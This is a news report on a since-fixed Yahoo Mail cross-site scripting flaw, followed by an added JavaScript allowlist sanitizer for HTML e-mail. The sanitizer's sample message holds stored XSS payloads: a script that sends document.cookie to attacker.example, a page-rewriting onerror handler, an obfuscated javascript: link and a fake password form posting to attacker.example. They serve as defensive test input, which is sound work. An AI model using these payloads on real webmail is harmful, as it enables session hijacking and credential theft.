Yahoo has fixed a bug in its Web-based e-mail system that would have allowed attackers to seize control of users' e-mail accounts.
The flaw let an attacker take over a user's account simply by sending that user a specially crafted e-mail: content embedded in the message was executed inside the recipient's logged-in Yahoo Mail session.
"A remarkable note about this bug is that no one seems to have found it before," Copley's advisory reads. "As far as anyone knows."
Speaking to ZDNet Australia by phone from the U.S., Copley said it would be possible to use the flaw to capture the username and password of a Yahoo account holder.
"You can change the page that they're looking at. You can get all their contact information. You can do anything that a user would do on the page," he said. "The main thing people would do with this is to grab usernames and passwords through a re-login page."
The bug would also let an attacker steal the user's session cookie, which contains personal details the user has submitted to Yahoo. Copley has praised Yahoo's response to the issue.
"They were very professional and fixed it very quickly. I was impressed," he said.
The discovery of the bug did not come from hours of painstaking research, Copley admits. He found it when another researcher, known as "http-equiv", e-mailed him, for research purposes, a virus that was over 100 KB in size.
"He was showing me a virus that was using one of my bugs in the wild. It had all this code, and one of the parts just started running," he explained. "We found it by accident."
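What the article describes is a stored cross-site scripting problem: a webmail client renders a message's HTML inside the recipient's logged-in page, so any active content that survives rendering runs with that user's session and can rewrite the page (a fake re-login form), read the contact list, or read the session cookie. The standard defence on the server side is to reduce a message body to an allowlist of inert tags and attributes before it is rendered. The JavaScript below is an added example written for this page; it is not Yahoo's code and is not taken from Copley's advisory. The tag and attribute allowlists, the `sanitizeHtml` and `safeUrl` names, the hostnames `attacker.example` and `mail.example.com`, and the sample message body are all my own choices, and the sample message is constructed to contain the kinds of payload the article mentions.

```javascript
// Added example (not Yahoo's code, not from Copley's advisory): an allowlist
// sanitizer for HTML e-mail bodies. Everything not on the allowlist is
// removed before the message is rendered in the recipient's mailbox page.

// Tags that may survive. Allowlist sizes are an assumption for this example.
const ALLOWED_TAGS = new Set(["p", "br", "b", "i", "u", "em", "strong",
  "a", "ul", "ol", "li", "div", "span", "blockquote"]);
// Per-tag attribute allowlist. Every on* handler, style, src and so on is
// absent here and is therefore dropped.
const ALLOWED_ATTRS = { a: new Set(["href", "title"]), "*": new Set(["title"]) };
// Elements whose body is discarded too, not merely escaped into visible text.
const DROP_CONTENT = new Set(["script", "style", "iframe", "object", "embed",
  "form", "textarea", "title"]);

function escapeHtml(s) {
  return s.replace(/&/g, "&amp;").replace(/</g, "&lt;")
          .replace(/>/g, "&gt;").replace(/"/g, "&quot;");
}

// Accept only absolute http(s)/mailto links. Control characters and
// whitespace are stripped first so the scheme check sees the URL the way a
// browser would (browsers ignore them inside "java\tscript:").
function safeUrl(raw) {
  const cleaned = raw.replace(/[\u0000-\u0020\u007f]/g, "");
  return /^(https?:|mailto:)/i.test(cleaned) ? cleaned : null;
}

// A start or end tag with attributes in double, single or no quotes.
const TAG_RE = /^<(\/?)([a-zA-Z][a-zA-Z0-9]*)((?:\s+[^\s=>\/]+(?:\s*=\s*(?:"[^"]*"|'[^']*'|[^\s>]+))?)*)\s*\/?>/;
const ATTR_RE = /([^\s=>\/]+)(?:\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+)))?/g;

function sanitizeHtml(html) {
  let out = "";
  let i = 0;
  while (i < html.length) {
    const lt = html.indexOf("<", i);
    if (lt === -1) { out += escapeHtml(html.slice(i)); break; }
    out += escapeHtml(html.slice(i, lt));
    if (html.startsWith("<!--", lt)) {               // comments dropped whole
      const end = html.indexOf("-->", lt + 4);
      i = end === -1 ? html.length : end + 3;
      continue;
    }
    const m = TAG_RE.exec(html.slice(lt));
    if (!m) { out += "&lt;"; i = lt + 1; continue; }  // not a tag: escape '<'
    const [whole, slash, rawName, attrText] = m;
    const name = rawName.toLowerCase();
    i = lt + whole.length;
    if (DROP_CONTENT.has(name)) {
      if (!slash) {                                   // skip to the close tag
        const cm = new RegExp("</" + name + "\\s*>", "i").exec(html.slice(i));
        i = cm ? i + cm.index + cm[0].length : html.length;
      }
      continue;
    }
    if (!ALLOWED_TAGS.has(name)) continue;            // tag removed, text kept
    if (slash) { out += "</" + name + ">"; continue; }
    let attrs = "";
    for (const a of attrText.matchAll(ATTR_RE)) {
      const attr = a[1].toLowerCase();
      const value = a[2] ?? a[3] ?? a[4] ?? "";
      if (!(ALLOWED_ATTRS[name] || ALLOWED_ATTRS["*"]).has(attr)) continue;
      const v = attr === "href" ? safeUrl(value) : value;
      if (v === null) continue;                       // rejected URL scheme
      attrs += ` ${attr}="${escapeHtml(v)}"`;
    }
    out += `<${name}${attrs}>`;
  }
  return out;
}

// Constructed sample message: legitimate formatting mixed with the payload
// classes the article describes (cookie theft, page rewrite, fake re-login).
const SAMPLE_MESSAGE = [
  '<p>Hi, <b>see the attached report</b>.</p>',
  '<script>new Image().src="http://attacker.example/c?"+document.cookie</script>',
  '<img src="x" onerror="document.body.innerHTML=\'<h1>Session expired</h1>\'">',
  '<a href="java\tscript:alert(document.cookie)">re-login</a>',
  '<a href="https://mail.example.com/inbox" title="ok">inbox</a>',
  '<form action="http://attacker.example/steal">Password: <input name="p"></form>',
  '<div style="position:absolute;top:0">overlay</div>',
].join("\n");

const SANITIZED = sanitizeHtml(SAMPLE_MESSAGE);
console.log(SANITIZED);
```

Run with `node` to see what reaches the page: the script, the event handler, the `javascript:` link, the fake login form and the positioning style are gone, while the bold text and the `https:` link survive. The point of an allowlist over a denylist is that a scheme or attribute the author never thought of is rejected by default, which is why the tab-in-scheme and unknown-handler cases need no special rule. A hand-written tokenizer like this one is for illustration; in production, sanitize with a parser-based library such as DOMPurify rather than regular expressions.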